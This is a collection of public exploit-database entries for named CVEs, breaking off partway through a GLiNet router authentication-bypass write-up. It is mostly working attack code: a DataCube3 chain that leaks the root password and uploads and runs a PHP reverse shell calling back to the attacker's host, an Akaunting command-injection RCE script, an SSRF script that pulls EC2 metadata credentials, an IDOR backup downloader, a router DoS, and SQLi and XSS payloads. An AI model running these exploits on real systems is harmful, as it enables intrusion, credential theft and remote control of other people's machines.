<pre><code># Exploit Title: Wordpress Plugin Hide My WP < 6.2.9 - Unauthenticated SQLi <br /># Publication Date: 2023-01-11<br /># Original Researcher: Xenofon Vassilakopoulos<br /># Exploit Author: Xenofon Vassilakopoulos<br /># Submitter: Xenofon Vassilakopoulos<br /># Vendor Homepage: https://wpwave.com/<br /># Version: Hide My WP v6.2.8 and prior<br /># Tested on: Hide My WP v6.2.7<br /># Impact: Database Access<br /># CVE: CVE-2022-4681<br /># CWE: CWE-89<br /># CVSS Score: 8.6 (high)<br /><br />## Description<br /><br />The plugin does not properly sanitize and escape a parameter before using it in a SQL statement via an AJAX action available to unauthenticated users, leading to a SQL injection.<br /><br /><br />## Proof of Concept<br /><br />curl -k --location --request GET "http://localhost:10008" --header "X-Forwarded-For: 127.0.0.1'+(select*from(select(sleep(20)))a)+'"<br /><br /></code></pre>
<pre><code># Exploit Title: DataCube3 v1.0 - Unrestricted file upload 'RCE'<br /># Date: 7/28/2022<br /># Exploit Author: Samy Younsi - NS Labs (https://neroteam.com)<br /># Vendor Homepage: https://www.f-logic.jp<br /># Software Link: https://www.f-logic.jp/pdf/support/manual_product/manual_product_datacube3_ver1.0_sc.pdf<br /># Version: Ver1.0<br /># Tested on: DataCube3 version 1.0 (Ubuntu)<br /># CVE : CVE-2024-25830 + CVE-2024-25832<br /><br /># Exploit chain reverse shell, information disclosure (root password leak) + unrestricted file upload<br /><br />from __future__ import print_function, unicode_literals<br />from bs4 import BeautifulSoup<br />import argparse<br />import requests<br />import json<br />import urllib3<br />import re<br />urllib3.disable_warnings()<br /><br />def banner():<br /> dataCube3Logo = """ <br /> ▒▒▒▒▒▒████████████████████████████████████▓▓▓▓▓▓▓▓<br /> ▒▒▒▒▒▒▒▒██ DataCube3 Ver1.0 █F-logic▓▓<br /> ▒▒████▒▒██ ████ ████ ██▓▓▓▓▓▓▓▓<br /> ▒▒████▒▒██ ████ ████ ██▓▓▓▓▓▓▓▓<br /> ▒▒▒▒▒▒▒▒██ ████ ████ ██▓▓▓▓▓▓▓▓<br /> ▒▒▒▒▒▒▒▒██ ██▓▓████▓▓<br /> ▒▒▒▒▒▒▒▒██ ██ ██ ██▓▓████▓▓<br /> ▒▒▒▒▒▒▒▒██ █████████████████ ██▓▓▓▓▓▓▓▓<br /> ▒▒▒▒▒▒████████████████████████████████████▓▓▓▓▓▓ <br /> <br />\033[1;92mSamy Younsi (Necrum Security Labs)\033[1;m \033[1;91mDataCube3 exploit chain reverse shell\033[1;m <br /> FOR EDUCATIONAL PURPOSE ONLY. <br /> """<br /> return print('\033[1;94m{}\033[1;m'.format(dataCube3Logo))<br /><br /><br />def extractRootPwd(RHOST, RPORT, protocol):<br /> url = '{}://{}:{}/admin/config_all.php'.format(protocol, RHOST, RPORT)<br /> try:<br /> response = requests.get(url, allow_redirects=False, verify=False, timeout=20)<br /> if response.status_code != 302:<br /> print('[!] \033[1;91mError: DataCube3 web interface is not reachable. 
Make sure the specified IP is correct.\033[1;m')<br /> exit()<br /> soup = BeautifulSoup(response.content.decode('utf-8'), 'html.parser')<br /> scriptTag = str(soup.find_all('script')[12]).replace(' ', '')<br /> rawLeakedData = re.findall('configData:.*,', scriptTag)[0]<br /> jsonLeakedData = json.loads('[{}]'.format(rawLeakedData.split('configData:[')[1].split('],')[0]))<br /> adminPassword = jsonLeakedData[12]['value']<br /> rootPassword = jsonLeakedData[14]['value']<br /> print('[INFO] DataCube3 leaked credentials successfully extracted: admin:{} | root:{}.\n[INFO] The target must be vulnerable.'.format(adminPassword, rootPassword))<br /> return rootPassword<br /> except:<br /> print('[ERROR] Can\'t grab the DataCube3 version...')<br /><br /><br />def generateAuthCookie(RHOST, RPORT, protocol, rootPassword):<br /> print('[INFO] Generating DataCube3 auth cookie ...')<br /> url = '{}://{}:{}/admin/config_all.php'.format(protocol, RHOST, RPORT)<br /> data = {<br /> 'user_id': 'root',<br /> 'user_pw': rootPassword,<br /> 'login': '%E3%83%AD%E3%82%B0%E3%82%A4%E3%83%B3'<br /> }<br /> try:<br /> response = requests.post(url, data=data, allow_redirects=False, verify=False, timeout=20)<br /> if response.status_code != 302:<br /> print('[!] \033[1;91mError: An error occur while trying to get the auth cookie, is the root password correct?\033[1;m')<br /> exit()<br /> authCookie = response.cookies.get_dict() <br /> print('[INFO] Authentication successful! 
Auth Cookie: {}'.format(authCookie)) <br /> return authCookie<br /> except:<br /> print('[ERROR] Can\'t grab the auth cookie, is the root password correct?')<br /><br /><br />def extractAccesstime(RHOST, RPORT, LHOST, LPORT, protocol, authCookie):<br /> print('[INFO] Extracting Accesstime ...')<br /> url = '{}://{}:{}/admin/setting_photo.php'.format(protocol, RHOST, RPORT)<br /> try:<br /> response = requests.get(url, cookies=authCookie, allow_redirects=False, verify=False, timeout=20)<br /> if response.status_code != 302:<br /> print('[!] \033[1;91mError: An error occur while trying to get the accesstime value.\033[1;m')<br /> exit()<br /> soup = BeautifulSoup(response.content.decode('utf-8'), 'html.parser')<br /> accessTime = soup.find('input', {'name': 'accesstime'}).get('value')<br /> print('[INFO] AccessTime value: {}'.format(accessTime))<br /> return accessTime<br /> except:<br /> print('[ERROR] Can\'t grab the accesstime value, is the root password correct?')<br /><br /><br />def injectReverseShell(RHOST, RPORT, LHOST, LPORT, protocol, authCookie, accessTime):<br /> print('[INFO] Injecting PHP reverse shell script ...')<br /> filename='rvs.php'<br /> payload = '<?php $sock=fsockopen("{}",{});$proc=proc_open("sh", array(0=>$sock, 1=>$sock, 2=>$sock),$pipes);?>'.format(LHOST, LPORT)<br /><br /> data = '-----------------------------113389720123090127612523184396\r\nContent-Disposition: form-data; name="add"\r\n\r\nå��ç��追å�\xA0\r\n-----------------------------113389720123090127612523184396\r\nContent-Disposition: form-data; name="addPhoto"; filename="{}"\r\nContent-Type: image/jpeg\r\n\r\n{}\r\n-----------------------------113389720123090127612523184396\r\nContent-Disposition: form-data; name="accesstime"\r\n\r\n{}\r\n-----------------------------113389720123090127612523184396--\r\n'.format(filename, payload, accessTime)<br /><br /> headers = {<br /> 'Content-Type': 'multipart/form-data; boundary=---------------------------113389720123090127612523184396'<br /> 
}<br /> url = '{}://{}:{}/admin/setting_photo.php'.format(protocol, RHOST, RPORT)<br /> try:<br /> response = requests.post(url, cookies=authCookie, headers=headers, data=data, allow_redirects=False, verify=False, timeout=20)<br /> if response.status_code != 302:<br /> print('[!] \033[1;91mError: An error occur while trying to upload the PHP reverse shell script.\033[1;m')<br /> exit()<br /> shellURL = '{}://{}:{}/images/slideshow/{}'.format(protocol, RHOST, RPORT, filename)<br /> print('[INFO] PHP reverse shell script successfully uploaded!\n[INFO] SHELL URL: {}'.format(shellURL))<br /> return shellURL<br /> except:<br /> print('[ERROR] Can\'t upload the PHP reverse shell script, is the root password correct?')<br /><br /><br />def execReverseShell(shellURL):<br /> print('[INFO] Executing reverse shell...')<br /> try:<br /> response = requests.get(shellURL, allow_redirects=False, verify=False)<br /> print('[INFO] Reverse shell successfully executed.')<br /> return<br /> except Exception as e:<br /> print('[ERROR] Reverse shell failed. Make sure the DataCube3 device can reach the host {}:{}')<br /> return False<br /><br /><br />def main():<br /> banner()<br /> args = parser.parse_args()<br /> protocol = 'https' if args.RPORT == 443 else 'http'<br /> rootPassword = extractRootPwd(args.RHOST, args.RPORT, protocol)<br /> authCookie = generateAuthCookie(args.RHOST, args.RPORT, protocol, rootPassword)<br /> accessTime = extractAccesstime(args.RHOST, args.RPORT, args.LHOST, args.LPORT, protocol, authCookie)<br /> shellURL = injectReverseShell(args.RHOST, args.RPORT, args.LHOST, args.LPORT, protocol, authCookie, accessTime)<br /> execReverseShell(shellURL)<br /><br /><br />if __name__ == '__main__':<br /> parser = argparse.ArgumentParser(description='Script PoC that exploit an unauthenticated remote command injection on f-logic DataCube3 devices.', add_help=False)<br /> parser.add_argument('--RHOST', help='Refers to the IP of the target machine. 
(f-logic DataCube3 device)', type=str, required=True)<br /> parser.add_argument('--RPORT', help='Refers to the open port of the target machine. (443 by default)', type=int, required=True)<br /> parser.add_argument('--LHOST', help='Refers to the IP of your machine.', type=str, required=True)<br /> parser.add_argument('--LPORT', help='Refers to the open port of your machine.', type=int, required=True)<br /> main()<br /><br /></code></pre>
<pre><code># Exploit Title: Akaunting < 3.1.3 - RCE<br /># Date: 08/02/2024<br /># Exploit Author: u32i@proton.me<br /># Vendor Homepage: https://akaunting.com<br /># Software Link: https://github.com/akaunting/akaunting<br /># Version: <= 3.1.3<br /># Tested on: Ubuntu (22.04)<br /># CVE : CVE-2024-22836<br /><br />#!/usr/bin/python3<br /><br />import sys<br />import re<br />import requests<br />import argparse<br /><br />def get_company():<br /> # print("[INF] Retrieving company id...")<br /> res = requests.get(target, headers=headers, cookies=cookies, allow_redirects=False)<br /> if res.status_code != 302:<br /> print("[ERR] No company id was found!")<br /> sys.exit(3)<br /> cid = res.headers['Location'].split('/')[-1]<br /> if cid == "login":<br /> print("[ERR] Invalid session cookie!")<br /> sys.exit(7)<br /> return cid<br /><br />def get_tokens(url):<br /> res = requests.get(url, headers=headers, cookies=cookies, allow_redirects=False)<br /> search_res = re.search(r"\"csrfToken\"\:\".*\"", res.text)<br /><br /> if not search_res:<br /> print("[ERR] Couldn't get csrf token")<br /> sys.exit(1)<br /><br /> data = {}<br /> data['csrf_token'] = search_res.group().split(':')[-1:][0].replace('"', '')<br /> data['session'] = res.cookies.get('akaunting_session')<br /> return data<br /><br />def inject_command(cmd):<br /> url = f"{target}/{company_id}/wizard/companies"<br /> tokens = get_tokens(url)<br /> headers.update({"X-Csrf-Token": tokens['csrf_token']})<br /> data = {"_token": tokens['csrf_token'], "_method": "POST", "_prefix": "company", "locale": f"en_US && {cmd}"}<br /> res = requests.post(url, headers=headers, cookies=cookies, json=data, allow_redirects=False)<br /> if res.status_code == 200:<br /> res_data = res.json()<br /> if res_data['error']:<br /> print("[ERR] Command injection failed!")<br /> sys.exit(4)<br /> print("[INF] Command injected!")<br /><br /><br />def trigger_rce(app, version = "1.0.0"):<br /> print("[INF] Executing the command...")<br /> 
url = f"{target}/{company_id}/apps/install"<br /> data = {"alias": app, "version": version, "path": f"apps/{app}/download"}<br /> headers.update({"Content-Type":"application/json"})<br /> res = requests.post(url, headers=headers, cookies=cookies, json=data, allow_redirects=False)<br /> if res.status_code == 200:<br /> res_data = res.json()<br /> if res_data['error']:<br /> search_res = re.search(r">Exit Code\:.*<", res_data['message'])<br /> if search_res:<br /> print("[ERR] Failed to execute the command")<br /> sys.exit(6)<br /> print("[ERR] Failed to install the app! no command was executed!")<br /> sys.exit(5)<br /> print("[INF] Executed successfully!")<br /><br />def login(email, password):<br /> url = f"{target}/auth/login"<br /> tokens = get_tokens(url)<br /><br /> cookies.update({<br /> 'akaunting_session': tokens['session']<br /> })<br /><br /> data = {<br /> "_token": tokens['csrf_token'],<br /> "_method": "POST",<br /> "email": email,<br /> "password": password<br /> }<br /> <br /> req = requests.post(url, headers=headers, cookies=cookies, data=data)<br /> res = req.json()<br /> if res['error']:<br /> print("[ERR] Failed to log in!")<br /> sys.exit(8)<br /><br /> print("[INF] Logged in")<br /> cookies.update({'akaunting_session': req.cookies.get('akaunting_session')})<br /> <br />def main():<br /> inject_command(args.command)<br /> trigger_rce(args.alias, args.version)<br /><br />if __name__=='__main__':<br /> parser = argparse.ArgumentParser()<br /> parser.add_argument("-u", "--url", help="target url")<br /> parser.add_argument("--email", help="user login email.")<br /> parser.add_argument("--password", help="user login password.")<br /> parser.add_argument("-i", "--id", type=int, help="company id (optional).")<br /> parser.add_argument("-c", "--command", help="command to execute.")<br /> parser.add_argument("-a", "--alias", help="app alias, default: paypal-standard", default="paypal-standard")<br /> parser.add_argument("-av", "--version", help="app 
version, default: 3.0.2", default="3.0.2")<br /><br /> args = parser.parse_args()<br /> <br /> headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.102 Safari/537.36"}<br /> cookies = {}<br /> target = args.url<br /><br /> try:<br /> login(args.email, args.password)<br /> company_id = get_company() if not args.id else args.id<br /> main()<br /> except:<br /> sys.exit(0)<br /><br /></code></pre>
<pre><code>#!/usr/bin/python3<br />#<br /># Title: Hitachi NAS (HNAS) System Management Unit (SMU) Backup & Restore IDOR Vulnerability <br /># CVE: CVE-2023-5808<br /># Date: 2023-12-13<br /># Exploit Author: Arslan Masood (@arszilla)<br /># Vendor: https://www.hitachivantara.com/<br /># Version: < 14.8.7825.01<br /># Tested On: 13.9.7021.04 <br /><br />import argparse<br />from datetime import datetime<br />from os import getcwd<br /><br />import requests<br /><br />parser = argparse.ArgumentParser(<br /> description="CVE-2023-5808 PoC",<br /> usage="./CVE-2023-5808.py --host <Hostname/FQDN/IP> --id <JSESSIONID> --sso <JSESSIONIDSSO>"<br /> )<br /><br /># Create --host argument:<br />parser.add_argument(<br /> "--host",<br /> required=True,<br /> type=str,<br /> help="Hostname/FQDN/IP Address. Provide the port, if necessary, i.e. 127.0.0.1:8443, example.com:8443"<br /> )<br /><br /># Create --id argument:<br />parser.add_argument(<br /> "--id",<br /> required=True,<br /> type=str,<br /> help="JSESSIONID cookie value"<br /> )<br /><br /># Create --sso argument:<br />parser.add_argument(<br /> "--sso",<br /> required=True,<br /> type=str,<br /> help="JSESSIONIDSSO cookie value"<br /> )<br /><br />args = parser.parse_args()<br /><br />def download_file(hostname, jsessionid, jsessionidsso):<br /> # Set the filename:<br /> filename = f"smu_backup-{datetime.now().strftime('%Y-%m-%d_%H%M')}.zip"<br /><br /> # Vulnerable SMU URL:<br /> smu_url = f"https://{hostname}/mgr/app/template/simple%2CBackupSmuScreen.vm/password/"<br /><br /> # GET request cookies<br /> smu_cookies = {<br /> "JSESSIONID": jsessionid,<br /> "JSESSIONIDSSO": jsessionidsso<br /> }<br /><br /> # GET request headers:<br /> smu_headers = {<br /> "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0",<br /> "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8",<br /> "Accept-Language": "en-US,en;q=0.5",<br /> "Accept-Encoding": 
"gzip, deflate",<br /> "Dnt": "1",<br /> "Referer": f"https://{hostname}/mgr/app/action/admin.SmuBackupRestoreAction/eventsubmit_doperform/ignored",<br /> "Upgrade-Insecure-Requests": "1",<br /> "Sec-Fetch-Dest": "document",<br /> "Sec-Fetch-Mode": "navigate",<br /> "Sec-Fetch-Site": "same-origin",<br /> "Sec-Fetch-User": "?1",<br /> "Te": "trailers",<br /> "Connection": "close"<br /> }<br /><br /> # Send the request:<br /> with requests.get(smu_url, headers=smu_headers, cookies=smu_cookies, stream=True, verify=False) as file_download:<br /> with open(filename, 'wb') as backup_archive:<br /> # Write the zip file to the CWD:<br /> backup_archive.write(file_download.content)<br /><br /> print(f"(unknown) has been downloaded to {getcwd()}")<br /><br />if __name__ == "__main__":<br /> download_file(args.host, args.id, args.sso)<br /> <br /><br /></code></pre>
<pre><code># Exploit Title: TP-Link TL-WR740N - Buffer Overflow 'DOS'<br /># Date: 8/12/2023<br /># Exploit Author: Anish Feroz (ZEROXINN)<br /># Vendor Homepage: http://www.tp-link.com<br /># Version: TP-Link TL-WR740n 3.12.11 Build 110915 Rel.40896n<br /># Tested on: TP-Link TL-WR740N<br /><br />#Description:<br /><br />#There exist a buffer overflow vulnerability in TP-Link TL-WR740 router that can allow an attacker to crash the web server running on the router by sending a crafted request. To bring back the http (webserver), a user must physically reboot the router.<br /><br />#Usage:<br /><br />#python3 target username password<br />#change port, if required<br /><br />------------------------------------------------POC-----------------------------------------<br /><br />#!/usr/bin/python<br /><br />import requests<br />from requests.auth import HTTPBasicAuth<br />import base64<br /><br />def send_request(ip, username, password):<br /> auth_url = f"http://{ip}:8082"<br /> target_url = f"http://{ip}:8082/userRpm/PingIframeRpm.htm?ping_addr=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA&doType=ping&isNew=new&sendNum=4&pSize=64&overTime=800&trHops=20"<br /><br /> credentials = f"{username}:{password}"<br /> encoded_credentials = base64.b64encode(credentials.encode()).decode()<br /><br /> headers = {<br /> "Host": f"{ip}:8082",<br /> "Authorization": f"Basic {encoded_credentials}",<br /> "Upgrade-Insecure-Requests": "1",<br /> "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36",<br /> "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",<br /> "Referer": f"http://{ip}:8082/userRpm/DiagnosticRpm.htm",<br /> "Accept-Encoding": "gzip, 
deflate",<br /> "Accept-Language": "en-US,en;q=0.9",<br /> "Connection": "close"<br /> }<br /><br /> session = requests.Session()<br /> <br /> response = session.get(target_url, headers=headers)<br /><br /> if response.status_code == 200:<br /> print("Server Crashed")<br /> print(response.text)<br /> else:<br /> print(f"Script Completed with status code {response.status_code}")<br /><br />ip_address = input("Enter IP address of the host: ")<br />username = input("Enter username: ")<br />password = input("Enter password: ")<br /><br />send_request(ip_address, username, password)<br /><br /></code></pre>
<pre><code>Title: MongoDB MONGOSH Password Exposure Vulnerability<br />Product: MongoDB database<br />Tool: mongosh<br />Affected Version(s): 2.0.1, 2.1.1, 2.1.4, 2.1.5<br />Tested Version(s): 2.0.1, 2.1.1, 2.1.4, 2.1.5<br />Risk Level: Low<br />Author of Advisory: Emad Al-Mousa<br /><br /><br />*****************************************<br />Vulnerability Details:<br /><br />The vulnerability is in "mongosh", the MongoDB shell, which is a JavaScript and Node.js REPL environment for interacting with MongoDB deployments in Atlas, locally, or on another remote host. So, it is basically a command-line utility to run database commands and JavaScript against a back-end MongoDB database system.<br /><br />MONGOSH has two vulnerabilities where passwords can be exposed and leaked, which an attacker with access to the operating system can weaponize for unauthorized access to the MongoDB database system.<br /><br /><br />*****************************************<br />Proof of Concept (PoC):<br /><br />Vulnerability No. 1: passwordPrompt() shows the password in clear text<br /><br />Per the documentation:<br /><br />https://www.mongodb.com/docs/manual/reference/method/passwordPrompt/#mongodb-method-passwordPrompt<br /><br />The password should not be displayed; however, I found that it appears in clear text in the prompt!<br /><br />The passwordPrompt() function was tested in conjunction with the db.createUser, db.changeUserPassword and db.auth commands, and all of them allowed the clear-text password to appear.<br /><br /><br /><br /><br />admin> use admin<br />already on db admin<br />admin> db.createUser({user:"mongo2", pwd: passwordPrompt(), roles:["root"]})<br />Enter password<br />mongo<br />*****{ ok: 1 }<br />admin><br /><br /><br />Vulnerability No. 2
: Password is exposed in the mongosh_repl_history file with the db.auth command<br /><br /><br />Mongosh was tested with both the “remove” and “remove-redact” modes:<br /><br />config.set (redactHistory, “remove-redact”)<br /><br />config.set (‘redactHistory’, “remove”)<br /><br />In a Linux Red Hat environment, the file $MONGOHOME/.mongodb/mongosh/mongosh_repl_history<br /><br />contains the password in clear text for historical authentication commands (db.auth() and db.createUser); per the documentation at https://www.mongodb.com/docs/mongodb-shell/logs/ the logs should omit the credentials, but this did not happen!<br /><br />In a Windows environment the file is under: C:\Users\windows_profile_user\AppData\Roaming\mongodb\mongosh<br /><br />The commands run for user creation (db.createUser) and authentication (db.auth()) are logged with the username and password explicitly, as shown below:<br /><br />cat mongosh_repl_history<br /><br />use admin<br /><br />db.createUser({user:"mongo2", pwd: passwordPrompt(), roles:["root"]})<br /><br /><br />*****************************************<br />References:<br />https://databasesecurityninja.wordpress.com/2024/03/07/mongodb-mongosh-password-exposure-vulnerability/<br />https://www.mongodb.com/docs/manual/reference/method/passwordPrompt/#mongodb-method-passwordPrompt<br />https://www.mongodb.com/docs/mongodb-shell/logs/<br /><br /><br /><br /></code></pre>
<pre><code># Exploit Title: Ladder v0.0.21 Server-side request forgery (SSRF)<br /># Date: 2024-01-20<br /># Exploit Author: @_chebuya<br /># Software Link: https://github.com/everywall/ladder<br /># Version: v0.0.1 - v0.0.21<br /># Tested on: Ubuntu 20.04.6 LTS on AWS EC2 (ami-0fd63e471b04e22d0)<br /># CVE: CVE-2024-27620<br /># Description: Ladder fails to apply sufficient default restrictions on destination addresses, allowing an attacker to make GET requests to addresses that would typically not be accessible from an external context. An attacker can access private address ranges, locally listening services, and cloud instance metadata APIs<br />import requests<br />import json<br /><br /># Ladder's proxy endpoint; the destination URL is appended directly to this path (see the GET below).<br />target_url = "http://127.0.0.1:8080/api/"<br /># Link-local EC2 instance metadata endpoint (IMDSv1, i.e. no session token required). It is normally reachable only from the instance itself, which is why an SSRF through Ladder exposes it.<br />imdsv1_url = "http://169.254.169.254/latest/meta-data/identity-credentials/ec2/security-credentials/ec2-instance"<br /><br /># Mitigation: Ladder should reject loopback, RFC 1918 and link-local (169.254.0.0/16) destinations by default; on the host, enforcing IMDSv2 makes a token-less proxied request fail.<br /># NOTE(review): no timeout= is passed, so a non-responding destination blocks this call indefinitely.<br />r = requests.get(target_url + imdsv1_url)<br /># Ladder appears to wrap the upstream response in JSON with a "body" field — verify against the Ladder API.<br />response_json = json.loads(r.text)<br />print(response_json["body"])<br /></code></pre>
<pre><code># Exploit Title: FullCourt enterprise XSS<br /># Date: 2023-28-12<br /># Exploit Author: Omar Sabagh<br /># Author Linkedin: https://www.linkedin.com/in/omar-s-b937791a2/<br /># Vendor Homepage: https://www.justicesystems.com<br /># Software Link: https://www.justicesystems.com/products/fullcourt-enterprise/<br /># Version: FullCourt enterprise - V8.2<br /># CVE : CVE-2024-25327<br /><br /># Summary: <br />During a penetration test conducted in December of 2023, it was discovered that the FullCourt Enterprise web application was susceptible to reflected (obfuscated and unobfuscated) XSS attacks, which could be injected via multiple parameters. This allows an attacker to redirect victims, create pop-ups and load external resources (such as externally hosted images). <br /><br /># POC: <br /><br />XSS example 1.)<br /><br />GET /fullcourtweb/courtCase.do?courtCaseBean.currentDefendantID=&formatCaseType=&formatCaseYear=2023&formatCaseNumber=0000000b9wsx%3cscript%3ealert(1)%3c%2fscript%3ec5yblw44633&retrieveAction.x=0&retrieveAction.y=0&courtCaseBean.criminalJuvenileCaseDomesticViolenceIndicator=&courtCaseBean.physicalFile=&courtCaseBean.sealed=&courtCaseBean.juryRequested=&courtCaseBean.batchLabelPrint=&courtCaseBean.juryVerdict=&courtCaseBean.citationImportCase=&doLabelSelect=false&printTrafficJacket=false&reportBean.reportMode=ledger&labelType=on HTTP/1.1<br /><br />--The value of the formatCaseNumber request parameter is copied into the HTML document as plain text between tags. The payload b9wsx<script>alert(1)</script>c5yblw44633 was submitted in the formatCaseNumber parameter. 
This input was echoed unmodified in the application's response.<br /><br />--This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.<br /><br />--The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.<br /><br />XSS example 2.)<br /><br />GET /fullcourtweb/courtCase.do?courtCaseBean.currentDefendantID=&formatCaseType=&formatCaseYear=2023&formatCaseNumber=0000000vymvd%d3cscript%3ealert(1)%3c%2fscript%3erkoqwks4vtrfy0vi%3cscript%3ealert(1)%3c%2fscript%3egonoz&retrieveAction.x=0&retrieveAction.y=0&courtCaseBean.juryRequested=&courtCaseBean.batchLabelPrint=&courtCaseBean.physicalFile=&courtCaseBean.sealed=&=&doLabelSelect=false&printTrafficJacket=false&reportBean.reportMode=ledger&labelType=on HTTP/1.1<br /><br />--The value of the formatCaseNumber request parameter is copied into the HTML document as plain text between tags. The payload fy0vi<script>alert(1)</script>gonoz was submitted in the formatCaseNumber parameter. This input was echoed unmodified in the application's response.<br /><br />XSS example 3.)<br /><br />--Unobfuscated direct URL injection<br />https://example-site.com/fullcourtweb/mvc/citationSearch?Index=1&r=qQDpfmw1%3C<script>alert('Bob--you owe 500 dollars,click here to resolve')</script>%3Ex5zbiql8jrw&citationNumber=12345&searchAction=<br /><br />--Obfuscated direct URL injection:<br />https://example-site.com/fullcourtweb/mvc/citationSearch?Index=1&r=qQDpfmw1%3C%73cr%69pt%3E%61ler%74(%27%4F%77ned%20%62y%20%4Fm%61r%27)%3C%2f%73cr%69pt%3Ex5zbiql8jrw&citationNumber=53267&searchAction=<br /><br />--For both examples, The value of the r request parameter is copied into the HTML document as plain text between tags. The payloads were submitted in the r parameter. This input was echoed unmodified in the application's response.<br /></code></pre>
<pre><code>## Title: NDtaskmatic-1.0-by-Mayuri.K Multiple-SQLi<br />## Author: nu11secur1ty<br />## Date: 03/07/2024<br />## Vendor: https://www.mayurik.com/<br />## Software: https://www.sourcecodester.com/php/17217/employee-management-system-php-and-mysql-free-download.html<br />## Reference: https://portswigger.net/web-security/sql-injection<br /><br />## Description:<br />Potential SQLi detected. Please manually confirm it after you check<br />manually the POST, GET, or other requests...<br />The payload from the puncher_SQLi_bypass_authentication module was<br />submitted successfully after the test.<br />The task_id is vulnerable to SQLi attacks, the attacker can get all<br />information from the system by using this vulnerability!<br /><br />STATUS: HIGH- Vulnerability<br /><br />[+]Payload:<br />```mysql<br />---<br />Parameter: task_id (GET)<br /> Type: error-based<br /> Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or<br />GROUP BY clause (FLOOR)<br /> Payload: task_id=39' AND (SELECT 8670 FROM(SELECT<br />COUNT(*),CONCAT(0x7176767871,(SELECT<br />(ELT(8670=8670,1))),0x717a717a71,FLOOR(RAND(0)*2))x FROM<br />INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)# FrpM<br /><br /> Type: stacked queries<br /> Title: MySQL >= 5.0.12 stacked queries (comment)<br /> Payload: task_id=39';SELECT SLEEP(7)#<br /><br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)<br /> Payload: task_id=39' AND (SELECT 9072 FROM (SELECT(SLEEP(7)))RtEq)# XSsn<br />---<br /><br />```<br /><br />## Reproduce:<br />[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/mayuri_k/2024/NDtaskmatic-1.0-by-Mayuri.K)<br /><br />## Proof and Exploit:<br />[href](https://www.nu11secur1ty.com/2024/03/ndtaskmatic-10-by-mayurik-multiple-sqli.html)<br /><br />## Time spend:<br />00:35:00<br /><br /><br />-- <br />System Administrator - Infrastructure Engineer<br />Penetration Testing Engineer<br />Exploit developer at 
https://packetstormsecurity.com/<br />https://cve.mitre.org/index.html<br />https://cxsecurity.com/ and<br />https://www.exploit-db.com/<br />0day Exploit DataBase https://0day.today/<br />home page: https://www.nu11secur1ty.com/<br />hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=<br /> nu11secur1ty <http://nu11secur1ty.com/><br /><br /><br />-- <br />System Administrator - Infrastructure Engineer<br />Penetration Testing Engineer<br />Exploit developer at https://packetstormsecurity.com/<br />https://cve.mitre.org/index.html<br />https://cxsecurity.com/ and https://www.exploit-db.com/<br />0day Exploit DataBase https://0day.today/<br />home page: https://www.nu11secur1ty.com/<br />hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=<br /> nu11secur1ty <http://nu11secur1ty.com/><br /></code></pre>
<pre><code>DZONERZY Security Research<br /><br />GLiNet: Router Authentication Bypass<br /><br />========================================================================<br />Contents<br />========================================================================<br /><br />1. Overview<br />2. Detailed Description<br />3. Exploit<br />4. Timeline<br /><br />========================================================================<br />1. Overview<br />========================================================================<br /><br />CVE-2023-46453 is a remote authentication bypass vulnerability in the web<br />interface of GLiNet routers running firmware versions 4.x and up. The<br />vulnerability allows an attacker to bypass authentication and gain access<br />to the router's web interface.<br /><br />========================================================================<br />2. Detailed Description<br />========================================================================<br /><br />The vulnerability is caused by a lack of proper authentication checks in the<br />/usr/sbin/gl-ngx-session file. The file is responsible for authenticating<br />users to the web interface. The authentication proceeds in several stages.<br /><br />Stage 1:<br /><br />During the first stage the user sends a request to the challenge rpc<br />endpoint. The endpoint returns a random nonce value used later in the<br />authentication process.<br /><br />Stage 2:<br /><br />During the second stage the user sends a request to the login rpc endpoint<br />with the username and the encrypted password. 
The encrypted password is<br />calculated by the following formula:<br /><br />md5(username + crypt(password) + nonce)<br /><br />The crypt function is the standard Unix crypt function.<br /><br />The vulnerability lies in the fact that the username is not sanitized<br />properly before being passed to the login_test function in the Lua script.<br /><br />------------------------------------------------------------------------<br />local function login_test(username, hash)<br /> if not username or username == "" then return false end<br /><br /> for l in io.lines("/etc/shadow") do<br /> local pw = l:match('^' .. username .. ':([^:]+)')<br /> if pw then<br /> for nonce in pairs(nonces) do<br /> if utils.md5(table.concat({username, pw, nonce}, ":")) ==<br />hash then<br /> nonces[nonce] = nil<br /> nonce_cnt = nonce_cnt - 1<br /> return true<br /> end<br /> end<br /> return false<br /> end<br /> end<br /><br /> return false<br />end<br />------------------------------------------------------------------------<br /><br />This function checks the username against the /etc/shadow file. If the username<br />is found in the file, the script will extract the password hash and compare<br />it to the hash sent by the user. If the hashes match, the user is<br />authenticated.<br /><br />The issue is that the username is not sanitized properly before being<br />concatenated with the regex. This allows an attacker to inject a regex into<br />the username field and modify the final behavior of the regex.<br /><br />For instance, the following username will match the user ID of the root user:<br /><br />root:[^:]+:[^:]+ will become root:[^:]+:[^:]+:([^:]+)<br /><br /><br />This will match the "root:" string and then any character until the next ":"<br />character. 
